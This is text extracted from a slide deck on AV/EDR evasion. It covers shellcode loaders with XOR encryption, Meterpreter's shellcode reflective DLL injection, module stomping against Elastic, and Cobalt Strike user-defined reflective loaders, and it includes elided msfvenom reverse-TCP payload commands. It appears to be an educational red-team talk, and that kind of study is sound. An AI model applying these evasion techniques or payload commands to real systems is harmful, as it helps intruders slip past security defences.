# https://docs.google.com/presentation/d/1qn-JkqwkYZCY391gZNmPZhTw9gYENIbhgRNJAg3dXf0/edit#slide=id.g3322b3aca21_0_117
Demystifying AV/EDR Evasion
Hello, can you please turn off Defender? 🥺🥺
whoami
Some topics discussed are kept intentionally vague or surface-level for brevity and may result in unfavorable outcomes if not fully understood.
Prologue
Table of Contents
01 Introduction to Evasion: What is AV? What is EDR?
02 Tame the AV: Writing your own malware
03 Understanding your Tradecraft: Meterpreter Case Study
04 Memory Gymnastics: putting what we learnt into practice (Elastic 12.2)
Introduction To Evasion
01
Why should I care?
Anti-Virus (AV)
Detection Methods (AV)
Static Analysis: file hash or known malicious bytes
Dynamic Analysis: behavior of the malware
AMSI Patch
Get-MpThreatDetection | Select-Object ProcessName, Resources | Format-List
Cloud Analysis
Tame the AV
02
how 2 run C2 :(
Shellcode TLDR
Meterpreter Shellcode
3 steps (ignore this for now)
long live the shellcode
meterpreter makes it ez for u!
4 steps!
Recap
2. decryption function (xor)
3. decrypt shellcode
4. allocate memory for shellcode
5. copy shellcode into memory
our shellcode
redirect execution to shellcode
shellcode
thread @ shellcode
why encrypt shellcode?
finding the detection
shellcode!
.data section is where global variables are declared & stored
long live the shellcode
TLDR
No encryption + raw shellcode on disk = bad
Missing Puzzle Pieces (Part 1)
Pipe Creation
Start Pipe
When you do sus things, memory scans happen
our shellcode is not encrypted anymore :(
Missing Puzzle Pieces (Part 1)
TLDR
getting your callback is only the first step
Understanding your Tradecraft
03
Missing Puzzle Pieces (Part 2)
context (native api)
some malware call ntapis directly
x64dbg-ing
thread creation
Address of shellcode
ZwCreateThreadEx called
we’re here
additional memory allocation?!
ZwAllocateVirtualMemory called again?
Another thread created?
This is not the memory we allocated
It’s always the black box
DLL Loading
Reflective DLL Injection
Find ReflectiveLoader()
classic shellcode injection
Start thread at ReflectiveLoader() instead!
Reflective DLL Injection
we’re getting very close to shellcode
shellcode reflective DLL injection (srdi)
what if we placed “LoadRemoteLibraryR” inside of the Reflective DLL?
this is… shellcode!
shellcode reflective DLL injection (srdi)
hotpatching the DOS header (trampoline)
LoadRemoteLibraryR in raw assembly!
the shellcode is a lie
meterpreter is a DLL
pebear @ meterpreter shellcode
Original name of the DLL from the compiler!
shellcode.bin
meterpreter srdi
DOS header entrypoint is patched with a small stub that redirects execution to metsrv.dll->ReflectiveLoader()
LoadRemoteLibraryR
The DOS Hotpatch
DOS Header @ shellcode.bin
DOS Header @ notepad.exe
trampoline!
Trampolines
Trampoline to ReflectiveLoader()
Calculate Address of ReflectiveLoader()
Trampolines
ReflectiveLoader
Beacon->DllMain
main beacon loop
meterpreter srdi
that’s your shellcode!
Missing Puzzle Pieces (Part 2)
Our shellcode is allocating new memory, hmm…
Address of shellcode
TLDR
meterpreter’s shellcode doesn’t respect the memory that you allocate
Meterpreter
Is that a bad thing? (No)
Meterpreter’s design is extremely flexible and stable!
This can be replaced with any language!
Executable Formats (--format aspx)
msfvenom -p windows/x64/meterpreter_reverse_tcp … --format aspx
Memory Allocation
Shellcode Copy
Execute Shellcode
Executable Formats (--format ps1)
msfvenom -p windows/x64/meterpreter_reverse_tcp … --format ps1
Memory Allocation
Shellcode Copy
Execute Shellcode
Executable Formats (--format vba)
msfvenom -p windows/x64/meterpreter_reverse_tcp … --format vba
Memory Allocation
Shellcode Copy
Execute Shellcode
Is that a bad thing? (YES)
you need to manage memory in 2 locations: the shellcode loader & the ReflectiveLoader
https://x.com/_RastaMouse/status/1867899064907677755
Memory Gymnastics
04
EDR Evasion
much harder to evade if u don’t know what you’re doing
A Decade Old Technique
Almost every popular C2 framework uses some variation of sRDI to generate position independent beacon
every C2 framework uses the same technique
Memory Gymnastics
Why is unbacked memory so bad?
Backed Memory?
Allocate RW
Flip to RX
Thread points to RX memory now
Private + RWX
Legitimate Memory
testing memory gymnastics
Unbacked RX (our shellcode loader from earlier)
Elastic 8.12.2
module stomping
Image taken from: https://naksyn.com/images/modulestomping.png
Backed Memory?
where’s my shellcode
Backed Memory?
here
Backed Memory?
Malleable C2
So what?
Our beacon finally lives in clean memory…
Elastic 8.12.2
Module-Backed RX
Elastic 8.12.2
Module-Backed RX
Recap
Cobalt Strike’s ReflectiveLoader allocates new memory
Can we get any more control?
The User-Defined Reflective Loader (UDRL)
ReflectiveLoader
User-Defined Reflective Loader (> CS4.4)
BokuLoader (@0xBoku)
hooking the IAT
AceLoader (@kyleavery_)
Return address spoofing
0xC2 (cube0x0)
Vendors are starting to move away from Reflective Loading
Hannibal (Mythic Agent)
So… what’s next?
i’m lost af
browsers!
languages w/ runtime
Conclusion
References & Recommended Reads
Everything shared is NOT NEW INFORMATION; the heavy lifting was done by much smarter people.
https://attl4s.github.io/assets/pdf/Understanding_a_Payloads_Life.pdf
https://cloud.google.com/blog/topics/threat-intelligence/defining-cobalt-strike-components
https://www.mdsec.co.uk/2022/07/part-1-how-i-met-your-beacon-overview/
https://www.mdsec.co.uk/2022/07/part-2-how-i-met-your-beacon-cobalt-strike/
https://ristbs.github.io/2023/02/08/your-pocket-guide-to-opsec-in-adversary-emulation.html
https://github.com/monoxgas/sRDI
https://dtsec.us/2023-09-15-StackSpoofin/
https://securityintelligence.com/x-force/defining-cobalt-strike-reflective-loader/
https://www.cobaltstrike.com/blog/cobalt-strike-4-5-fork-run-youre-history
https://kyleavery.com/posts/avoiding-memory-scanners/
https://5pider.net/blog/2024/01/27/modern-shellcode-implant-design/
https://www.0xc2.io/posts/introduction-and-technical-overview/
https://ericesquivel.github.io/posts/bypass
https://sillywa.re/posts/flower-da-flowin-shc/